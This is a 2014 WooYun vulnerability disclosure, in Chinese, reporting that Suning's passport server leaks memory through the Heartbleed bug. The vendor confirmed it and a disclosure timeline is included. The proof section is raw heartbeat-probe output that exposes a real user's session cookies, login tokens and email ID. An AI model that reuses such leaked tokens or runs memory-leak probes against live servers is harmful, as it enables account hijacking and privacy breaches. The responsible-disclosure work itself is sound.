当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055950

漏洞标题:苏宁易购主站运维不当导致可获取服务器敏感信息

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: MeirLin

提交时间:2014-04-08 17:54

修复时间:2014-05-23 17:55

公开时间:2014-05-23 17:55

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-09: 厂商已经确认,细节仅向厂商公开
2014-04-19: 细节向核心白帽子及相关领域专家公开
2014-04-29: 细节向普通白帽子公开
2014-05-09: 细节向实习白帽子公开
2014-05-23: 细节向公众公开

简要描述:

苏宁易购主站运维不当导致可以登录随机用户并且获取服务器敏感信息

详细说明:

https://passport.suning.com


1.png


Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 3559
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
   .@....SC[...r....+..H...9........w.3....f.....".!.9.8.........5.
   ............................3.2.....E.D...../...A...............
   ..................I...........4.2...............................
   ....................#.......31 (KHTML, like Gecko));dv(ZP900S Bu
   ild/IMM76D);pr(UCBrowser/9.3.0.321);ov(Android 4.0.4);pi(540*960
   );ss(540*960);up(U3/0.8.0);er(U);bt(UM);pm(1);bv(1);nm(0);im(0);
   sr(0);nt(1);..Referer: https://m.suning.com/emall/SNMWLogonView?
   catalogId=10051&storeId=10052&krypto=jH%2BX7iif8nPNG7HOz2SMdJVSD
   hxbo7s2BHmi3q0tE2x61VDNMf05R%2BxZlUW9orIhD7h%2F%2BzVGOV5a%0Ap6B9
   Oum0psvB3jQ6jFoOihj5p15IfGcSRafMfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8
   xl0S0y1C%0AJHkOLl7%2FYQo2BNW2UjhOrWWUeuGuYM74jazmYQE%2BlBaamCJV2
   vC67gkPLSkQ0WYa1uOEqHKE3mpk%0AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772
   d9pC02KvEV9550T6O%2FKjM7%2B4HV%2BTlJZOP%2BjbAHr6Jh%0AS%2ByeAhNU%
   2BKKyeShSYwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGR
   LSZHb%0ApAxpdb%2Bogio15cNE3SxbzFsCQNf3mi34SUEn%2BG0O7OdoBUShBxrx
   dzme5pf%2BgoSSiLgcTtuqBcbA%0AlFxiGHubpcL%2BzCngI8dCUGMLFgOFfJUT%
   2BYpHgdTY8a62BdOy4HwiQAV3tNI4H6G42uQ%3D&ddkey=https:Logon..Accep
   t-Encoding: gzip..User-Agent: Mozilla/5.0 (Linux; U; Android 4.0
   .4; zh-CN; ZP900S Build/IMM76D) AppleWebKit/534.31 (KHTML, like 
   Gecko) UCBrowser/9.3.0.321 U3/0.8.0 Mobile Safari/534.31..isAjax
   Request: 1..Accept: application/json, text/javascript, */*; q=0.
   01..Connection: keep-alive.......~.AHC-..,....ning.com/emall/SNM
   WLogonView%3FcatalogId%3D10051%26storeId%3D10052%26krypto%3DjH%2
   52BX7iif8nPNG7HOz2SMdJVSDhxbo7s2BHmi3q0tE2x61VDNMf05R%252BxZlUW9
   orIhD7h%252F%252BzVGOV5a%250Ap6B9Oum0psvB3jQ6jFoOihj5p15IfGcSRaf
   MfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8xl0S0y1C%250AJHkOLl7%252FYQo2BN
   W2UjhOrWWUeuGuYM74jazmYQE%252BlBaamCJV2vC67gkPLSkQ0WYa1uOEqHKE3m
   pk%250AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772d9pC02KvEV9550T6O%252FK
   jM7%252B4HV%252BTlJZOP%252BjbAHr6Jh%250AS%252ByeAhNU%252BKKyeShS
   YwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGRLSZHb%250
   ApAxpdb%252Bogio15cNE3SxbzFsCQNf3mi34SUEnLLGK97g%252BKGYpqrD2QkR
   bSaYosuUiD%252FYvwmMJiWRC%250A7gGZ7GqLr9KVOV7wMMGx51tIEIovTOObvp
   V^m..+.'..F....*2C822%29%28233%2C973%29%28undefined%2Cundefined%
   29%280%2C0%29%28undefined%2Cundefined%29%280%2C0%29%28undefined%
   2Cundefined%29%280%2C0%29%28286%2C1016%29%28622%2C846%29; WC_USE
   RACTIVITY_42167480840=42167480840%2c10052%2c0%2cnull%2c139695011
   3713%2c1396957929635%2cnull%2cnull%2cnull%2cnull%2cRwQIfr6JwV58J
   U6yvO9k5VLVYXVEuc%2bDmq5Fjc6K3VNMTn4%2fRjISR3kC%2bfnhC6kvBMLxv2L
   dyZMc%0a4AR5IZgNeu%2b772rZlI%2f8sS4aCIiRurJTKJO761Zh63w9aqmp%2fM
   AkX7Hc%2b2SrdlEjnlrR2wkdwhEg%0a6hgeXCHr5DT6qcVCBIKY8yw2cb09jQ%3d
   %3d.....gh..:...W...1m..jj......est=a; abtestN=c; firstAccess=ye
   s; smhst=4352764a16812901a3965144a18803215a16812905; _snma=1%7C1
   38958281362275702%7C1389582813622%7C1396940751976%7C139694077367
   1%7C548%7C173; _snmp=139694075285671452; _snmb=13969400395312338
   4%7C1396940773687%7C1396940773680%7C16; __utma=1.1600380945.1389
   582814.1396927805.1396940040.150; __utmc=1; __utmz=1.1396940040.
   150.93.utmcsr=product.suning.com|utmccn=(referral)|utmcmd=referr
   al|utmcct=/snupgbpv_10052_10051_18802726_113110_.html; __utmv=1.
   buyer; _snmz=139694077851029170%7C%28505%2C1127%29; idsLoginUser
   IdLastTime=10823559%40qq.com; theme=default.......D5.....v!..>Nr
   sZtgqrHGojMLb2gOJuZwZRz8A%3d%3d...../..*.....EG.b...............

漏洞证明:

1.png

修复方案:

升级

版权声明:转载请注明来源 MeirLin@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-04-09 09:17

厂商回复:

已经确认

最新状态:

暂无

漏洞评价:

评论

  1. 2014-04-09 10:03 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    @江苏苏宁易购电子商务有限公司 审核通过了两次,然后那个已确认的洞好像被管理误删了 QAQ